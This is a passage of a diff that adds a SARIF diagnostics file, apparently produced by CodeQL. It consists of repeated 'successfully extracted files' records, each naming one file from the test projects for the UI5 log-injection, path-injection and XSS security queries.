"%SRCROOT%", + "index" : 189 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : 